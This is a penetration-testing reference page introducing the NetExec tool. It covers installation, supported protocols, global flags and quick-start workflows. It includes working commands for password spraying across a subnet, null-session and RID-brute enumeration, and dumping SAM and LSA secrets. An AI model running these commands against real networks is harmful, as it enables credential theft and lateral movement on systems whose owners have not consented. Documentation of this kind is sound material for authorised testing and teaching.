15 - NetExec (nxc)
#Overview
NetExec (binary: nxc or netexec) is the actively maintained successor to CrackMapExec (CME), which was deprecated in 2023. It is the single most versatile post-exploitation and lateral-movement tool in modern internal pentesting. NetExec wraps multiple protocols behind a unified command-line interface, letting you validate credentials, enumerate targets, execute commands, dump secrets, and run protocol-specific attack modules — all with the same syntax.
Why NetExec over individual tools:
- One syntax for SMB, LDAP, WinRM, MSSQL, SSH, FTP, RDP, VNC, and WMI
- Built-in credential spraying with lockout awareness
- Modular architecture — 50+ community modules for attack automation
- Database backend for tracking compromised hosts and credentials
- Consistent logging across all protocols
#Installation
# pip (recommended)
pip install netexec
# Kali / Debian-based
sudo apt install netexec
# From source
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec && pip install .
BASH
Verify installation:
netexec --version
netexec smb --help
BASH
#Protocol Support
| Protocol | Port | Use Case |
|---|---|---|
| SMB | 445 | Credential validation, share enum, user enum, hash dumping, command execution, pass-the-hash |
| LDAP | 389/636 | Domain user/group dump, kerberoasting, AS-REP roasting, ADCS/LAPS/gMSA enumeration |
| WinRM | 5985/5986 | Remote PowerShell execution, credential validation |
| MSSQL | 1433 | Database credential validation, xp_cmdshell execution, linked server enumeration |
| SSH | 22 | Credential validation, remote command execution, sudo privilege check |
| FTP | 21 | Credential validation, file listing and retrieval |
| RDP | 3389 | Credential validation, NLA status check, screenshot capture |
| VNC | 5900 | Credential validation, screenshot capture |
| WMI | 135 | Credential validation, remote command execution |
#General Syntax
netexec <protocol> <target(s)> -u <username> -p <password> [options]
# <protocol> -> smb, ldap, winrm, mssql, ssh, ftp, rdp, vnc, wmi
# <target(s)> -> single IP, CIDR range, or file of targets (-t targets.txt)
# -u -> username (single or file with -u users.txt)
# -p -> password (single or file with -p passwords.txt)
BASH
#Key Global Flags
| Flag | Purpose |
|---|---|
-u <user> | Single username or file (-u users.txt) |
-p <pass> | Single password or file (-p passwords.txt) |
-H <hash> | Pass-the-hash (NTLM hash) |
-d <domain> | Domain name (defaults to local auth if omitted) |
--local-auth | Authenticate against local SAM, not domain |
-x <cmd> | Execute command via native protocol method |
-X <ps_cmd> | Execute PowerShell command (SMB/WinRM) |
-M <module> | Run a specific module (e.g., -M lsassy) |
-L | List available modules for the protocol |
--continue-on-success | Don't stop after first valid credential |
--no-bruteforce | Treat user:pass as exact pairs (1:1 mapping) |
-t <file> | Target file (one IP/host per line) |
-j <seconds> | Jitter between attempts (spraying OPSEC) |
-o <output> | Output directory for module results |
--port <num> | Custom port |
--timeout <sec> | Connection timeout |
#Module Contents
| Page | Purpose |
|---|---|
| SMB Operations | Share/user/session enumeration, hash dumping, pass-the-hash, command execution, scuffy, wcc, lsassy |
| LDAP Operations | Domain enumeration, kerberoasting, AS-REP roasting, ADCS/LAPS/gMSA, delegation, BloodHound |
| WinRM Operations | Credential validation, remote PowerShell, local auth |
| MSSQL Operations | Database auth, privilege checks, xp_cmdshell, linked servers |
| SSH / FTP / RDP / VNC / WMI | Credential validation and execution across additional protocols |
| Password Spraying | Spraying strategies, lockout avoidance, combo lists, CIDR-wide campaigns |
| Credential Dumping | SAM/LSA/NTDS dumping, lsassy, DPAPI, offline cracking integration |
| AD Attacks via NetExec | Full AD attack chains: enum → roast → crack → validate → escalate |
| NetExec Modules Reference | Complete catalog of built-in modules with protocol, purpose, and OPSEC risk |
#Quick Start Workflows
#Validate a single credential set across a subnet
netexec smb 10.10.10.0/24 -u administrator -p 'Summer2024!' --continue-on-success
BASH
#Enumerate AD from unauthenticated position
netexec smb 10.10.10.5 -u '' -p '' --shares # null session shares
netexec smb 10.10.10.5 -u '' -p '' --rid-brute # RID cycle users
netexec ldap 10.10.10.5 -u '' -p '' --users # anonymous LDAP bind
BASH
#Spray then dump
netexec smb 10.10.10.0/24 -u users.txt -p 'Fall2024!' --continue-on-success
netexec smb 10.10.10.5 -u valid_user -p valid_pass --sam
netexec smb 10.10.10.5 -u valid_user -p valid_pass --lsa
BASH
#Related Modules
- Enumeration — Service discovery that feeds NetExec targets
- Active Directory Attacks — Techniques NetExec automates
- Lateral Movement — NetExec is the primary lateral movement tool
- Credential Hunting — What to do with dumped hashes
- Tools Cheat Sheet — Quick-reference NetExec commands